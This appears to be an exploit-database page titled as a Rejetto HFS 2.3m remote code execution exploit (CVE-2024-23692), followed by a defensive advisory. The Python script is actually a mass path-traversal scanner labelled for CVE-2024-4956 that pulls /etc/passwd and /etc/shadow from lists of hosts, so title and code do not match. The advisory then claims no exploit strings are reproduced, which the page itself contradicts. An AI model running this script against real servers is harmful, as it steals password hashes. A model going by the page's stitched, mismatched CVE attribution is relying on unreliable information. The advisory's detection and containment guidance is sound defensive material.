Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)

Exploit Author: VeryLazyTech Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2025-03-28

# Exploit Title: Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
# Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech 
# GitHub: https://github.com/verylazytech/CVE-2024-23692
# Vendor Homepage: http://rejetto.com/hfs/
# Software Link: http://rejetto.com/hfs/
# Version: 2.3m
# Tested on: Windows 10
# CVE: CVE-2024-23692

import requests
import random
import argparse
from colorama import Fore, Style

green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)


def banner():
    banner = f"""{bold}{random_color}
  ______     _______   ____   ___ ____  _  _     _  _   ___  ____   __   
 / ___\ \   / / ____| |___ \ / _ \___ \| || |   | || | / _ \| ___| / /_  
| |    \ \ / /|  _|     __) | | | |__) | || |_  | || || (_) |___ \| '_ \ 
| |___  \ V / | |___   / __/| |_| / __/|__   _| |__   _\__, |___) | (_) |
 \____|  \_/  |_____| |_____|\___/_____|  |_|      |_|   /_/|____/ \___/ 
                                                                         
__     __                _                      _____         _     
\ \   / /__ _ __ _   _  | |    __ _ _____   _  |_   _|__  ___| |__  
 \ \ / / _ \ '__| | | | | |   / _` |_  / | | |   | |/ _ \/ __| '_ \ 
  \ V /  __/ |  | |_| | | |__| (_| |/ /| |_| |   | |  __/ (__| | | |
   \_/ \___|_|   \__, | |_____\__,_/___|\__, |   |_|\___|\___|_| |_|
                 |___/                  |___/                       
                                                                                     
                    {bold}{white}@VeryLazyTech - Medium {reset}\n"""
                    
    return banner


def read_ip_port_list(file_path):
    with open(file_path, 'r') as file:
        lines = file.readlines()
    return [line.strip() for line in lines]


def make_request(ip_port, url_path):
    url = f"http://{ip_port}/{url_path}"
    try:
        response = requests.get(url, timeout=5) 
        return response.text
    except requests.RequestException as e:
        return None


def main(ip_port_list):
    for ip_port in ip_port_list:
        for url_path in ["%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd", "%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/shadow"]:
            response_text = make_request(ip_port, url_path)
            if response_text and "nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false" not in response_text and "Not Found" not in response_text and "400 Bad Request" not in response_text and "root" in response_text:
                print(f"Address: {ip_port}")
                print(f"File Contents for passwd:\n{response_text}" if "passwd" in url_path else f"File Contents for shadow:\n{response_text}")
                break


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-4956", usage=argparse.SUPPRESS)
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP with port for vulnerability detection\n")
    group.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection\n")
    args = parser.parse_args()
    
    if args.list:
        ip_port_list = read_ip_port_list(args.list)
        print(banner())
        main(ip_port_list)
    elif args.url:
        ip_port_list = [args.url]
        print(banner())
        main(ip_port_list)
    else:
        print(banner())
        parser.print_help()

Rejetto HTTP File Server (HFS) 2.3m — CVE-2024-23692: Overview

Rejetto HTTP File Server (HFS) is a lightweight Windows-based file-sharing web server. In 2024 a critical issue affecting the 2.3m release was publicly disclosed under CVE-2024-23692. The vulnerability allows remote attackers to achieve remote code execution (RCE) on affected HFS instances when certain conditions are met. This article explains the risk at a high level, how organizations can detect and mitigate exposure safely, and recommended post‑incident steps.

Who should care and why

Organizations exposing HFS (or any legacy web server) to the Internet — especially on default ports — are at elevated risk.
Servers running HFS with administrative features enabled or running under high‑privilege accounts (e.g., SYSTEM/Administrator) are particularly dangerous if compromised.
Incident responders, SOC teams, system administrators, and vulnerability managers need defensive guidance for detection, containment, and remediation.

High-level vulnerability description (non‑actionable)

Public reports indicate that a flaw in HFS 2.3m's handling of certain request inputs can be abused by a remote actor to execute arbitrary code on the host. Root causes commonly observed in these kinds of issues include inadequate input validation, unsafe file-path handling, and insufficient isolation of server capabilities. Because exploit details can be weaponized, this article intentionally avoids reproducing exploit strings or step‑by‑step attack instructions. The guidance below focuses on detection and remediation.

Impact

Complete system compromise: Remote code execution may allow attackers to run arbitrary commands, escalate privileges, and install persistent backdoors.
Data exfiltration: Files hosted on the server and other accessible data may be read and extracted.
Lateral movement: Compromised hosts can be used to pivot to internal systems, scan the network, or stage additional attacks.
Operational disruption: Service outages, ransomware, or compliance violations may follow a compromise.

Safe detection strategies (log and telemetry focused)

Detection should prioritize non‑destructive, defensive techniques. Focus on anomalous HTTP requests, unusual URL encodings, unexpected file reads, and processes spawned by the HFS process.

Web server logs: Look for highly encoded or obfuscated URL paths, repeated attempts to access unusual file locations, or long-running requests from the same client IP.
Process monitoring: Watch for child processes spawned by the HFS process or for command interpreters executing from the HFS working directory.
Network telemetry: Monitor for large outbound data transfers from the server shortly after suspicious requests, and for new external connections initiated by the server.
File integrity: Alert on new or modified executable or script files in directories used by HFS and on added startup items or scheduled tasks.

Example: defensive log rule (safe, non‑exploit)


# Example: Generic detection pattern for suspiciously encoded traversal-like sequences
# (This is a defensive illustration; do not use exploit payloads in scanning.)
if (http_request.uri contains "%2E%2E" OR http_request.uri contains "..%2F" ) and
   (http_response.status == 200 OR http_response.status == 500) then
    alert("Potential path‑handling abuse against HFS: check client_ip and requested resource")
end

Explanation: This pseudocode/principle illustrates a defensive rule: flag requests that include encoded traversal-like sequences combined with successful or server‑error responses. The rule is intentionally generic to avoid publishing exploit strings and to encourage adaptation to your environment and logging format.

Immediate mitigation steps (prioritize containment)

Isolate affected hosts from untrusted networks (block inbound Internet access to the server) while preserving evidence for investigation.
Apply vendor patches immediately if available. If a patch is not immediately available, implement network mitigations (firewall/WAF/ACLs) and reduce exposure.
Run HFS under a dedicated low‑privilege account and avoid running it with administrative privileges.
Review and rotate credentials, API keys, and certificates that could be exposed via a compromise.

Practical, defensive commands for Windows (example)


# PowerShell defensive checklist (examples)
# 1) Stop the service to prevent further risk (run as administrator)
Stop-Service -Name "HFS" -ErrorAction SilentlyContinue

# 2) Block incoming TCP connections to the HFS port (replace  with the service port)
New-NetFirewallRule -DisplayName "Block HFS external" -Direction Inbound -Protocol TCP -LocalPort <PORT> -Action Block

# 3) Create an evidence copy of the HFS directory for forensic review
$src = "C:\Path\To\HFS"
$dst = "C:\Forensics\HFS_snapshot"
Robocopy $src $dst /MIR /COPYALL

Explanation: These PowerShell examples are defensive. Stop-Service prevents further processing by the HFS instance. Adding a firewall rule blocks external TCP access to the server port. Robocopy copies application files for offline forensic analysis while preserving attributes. Always perform such actions in line with your incident‑response plan and retain original evidence where required by policy.

Patching and longer‑term remediation

Upgrade: Apply the official vendor patch or upgrade to the first non‑vulnerable HFS release. Validate the vendor advisory before applying upgrades.
Configuration hardening: Disable unnecessary features, restrict administrative interfaces to trusted networks, and enforce strong authentication.
Network segmentation: Place file‑sharing services in a dedicated segment with strict egress and ingress rules.
Use a WAF/IDS/IPS in front of web services to provide virtual patching while official updates are tested and deployed.
Least privilege: Ensure the service runs with the minimum privileges needed and that any artifacts created by the service reside in non‑privileged directories.

Post‑compromise investigation and recovery

Preserve evidence: Collect memory images, disk images, relevant logs, and configuration files before remediation where possible.
Forensic analysis: Look for persistence mechanisms (scheduled tasks, registry run keys, Windows services), unknown accounts, and unusual network connections.
Rebuild vs. patch: For critical compromises, prefer rebuilding systems from a known‑good image rather than attempting to clean an unknown compromise.
Credential rotation: Assume credentials for the host and related services are compromised; rotate keys, passwords, and certificates.
Post‑incident review: Conduct a root‑cause analysis and update detection controls, runbooks, and patch processes to reduce recurrence.

Prevention best practices

Minimize public exposure of legacy or developer‑oriented file servers. If public sharing is required, use modern, actively maintained solutions.
Automate patch management for software used in production and maintain an accurate inventory of services and versions.
Implement robust logging and centralized log aggregation (SIEM) with alerts for unusual request patterns and process activity.
Conduct regular threat‑aware penetration testing and red‑team exercises, focusing on Internet‑facing servers.

References and reporting

Type	Action
Vendor advisories	Consult the official Rejetto/HFS advisory page and follow vendor remediation guidance.
Vulnerability database	Look up CVE-2024-23692 in trusted vulnerability databases for status and tracked fixes.
Internal	Report incidents to your SOC/IR team and follow your organization’s incident‑response playbook.

Final notes

CVE-2024-23692 underscores the risk of running legacy file servers on Internet‑facing systems and the importance of rapid detection and containment. Prioritize patching and network controls, run services with minimal privileges, and apply layered defenses (WAF, segmentation, logging). If you suspect compromise, act quickly to isolate the host and engage your incident‑response process.